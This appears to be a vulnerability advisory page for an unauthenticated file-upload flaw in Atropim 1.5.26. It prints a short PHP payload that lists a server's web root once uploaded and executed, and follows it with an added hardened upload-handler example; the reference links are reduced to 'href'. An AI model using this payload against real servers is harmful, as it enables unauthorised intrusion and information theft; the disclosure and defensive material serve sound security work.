CVE-2023-26969: CVE-nu11secur1ty/vendors/atrocore/atrocore-1.5.26 at main · nu11secur1ty/CVE-nu11secur1ty

Atropim 1.5.26 is vulnerable to Directory Traversal.


atropim-1.5.26-Unauthenticated-File-Upload-RCE - Directory Traversal

Vendor:

Description:

The Create Import Feed option, with its paperclip (glyphicon-glyphicon-paperclip) CSV-format upload function, appears to be vulnerable to unauthenticated file upload leading to RCE (some user interaction is required). An attacker can easily upload a malicious file, execute it remotely, and obtain very sensitive information about the configuration of the system; with that information, further and more damaging attacks become possible.

STATUS: HIGH Vulnerability CRITICAL

[+]Exploit:

<?php
// by nu11secur1ty - 2023
// Lists the contents of the web root in ascending and descending order.
// Once such a file is uploaded and executed, its output reveals the
// server's directory layout and configuration files.
$dir = "/var/www/";
$ascending_order = scandir($dir);
$descending_order = scandir($dir, 1);

print_r($ascending_order);
print_r($descending_order);
?>
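The weaknesses the description names (no authentication on the import upload, no restriction on what is uploaded, and attacker-influenced file names) map directly onto the checks a hardened upload handler should perform. The following is an added example written for this page, not code from AtroPIM/Atropim or from the advisory author; the function name, the UPLOAD_DIR location, and the $isAuthenticated argument are assumptions standing in for the application's own session and configuration:

```php
<?php
// Added example (not project code): a hardened handler for a CSV import
// upload. Names such as storeCsvImport, UPLOAD_DIR and $isAuthenticated
// are assumptions; wire them to the application's own session and config.
declare(strict_types=1);

const UPLOAD_DIR = '/var/lib/app/imports';  // assumed: outside the web root
const MAX_BYTES  = 10 * 1024 * 1024;

/**
 * Validate and store one uploaded CSV ($file is one entry of $_FILES).
 * $isAuthenticated is the result of the application's own session check.
 * Returns the stored path on success; throws RuntimeException otherwise.
 */
function storeCsvImport(array $file, bool $isAuthenticated): string
{
    // 1. Require an authenticated session before touching the upload at all.
    if (!$isAuthenticated) {
        throw new RuntimeException('authentication required');
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // 2. The client-supplied name is used only for an extension allow-list;
    //    basename() strips any directory components ("../" included).
    $clientName = basename((string) ($file['name'] ?? ''));
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext !== 'csv') {
        throw new RuntimeException('only .csv files are accepted');
    }

    // 3. Check the content, not the client-declared MIME type. libmagic
    //    reports plain CSV as text/plain or text/csv; anything else is rejected.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = (string) $finfo->file($file['tmp_name']);
    if (!in_array($mime, ['text/plain', 'text/csv'], true)) {
        throw new RuntimeException("unexpected content type: $mime");
    }

    // 4. Refuse text that carries a PHP open tag. A genuine CSV containing
    //    a literal "<?" is rejected too; that false positive is acceptable here.
    $head = (string) file_get_contents($file['tmp_name'], false, null, 0, 8192);
    if (stripos($head, '<?') !== false || strpos($head, "\0") !== false) {
        throw new RuntimeException('script-like content in CSV');
    }

    // 5. Store under a server-generated name in a directory the web server
    //    never executes from. The client name never reaches the filesystem,
    //    so neither "../" nor a ".php" suffix in it can matter.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.csv';
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0640);
    return $target;
}

// Typical call site (assumed session API):
// $path = storeCsvImport($_FILES['file'], $session->isLoggedIn());
```

The two checks that matter most are the first and the last: an unauthenticated request never reaches the filesystem, and an accepted file lands under a random name in a directory outside the document root, so even a file that slips past the content checks is never served or executed by the web server. The MIME and open-tag checks are defence in depth on top of that, not a substitute for it.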

Reproduce:

href

Reference:

href

Reference:

href

Proof and Exploit:

href

Time spent:

00:15:00
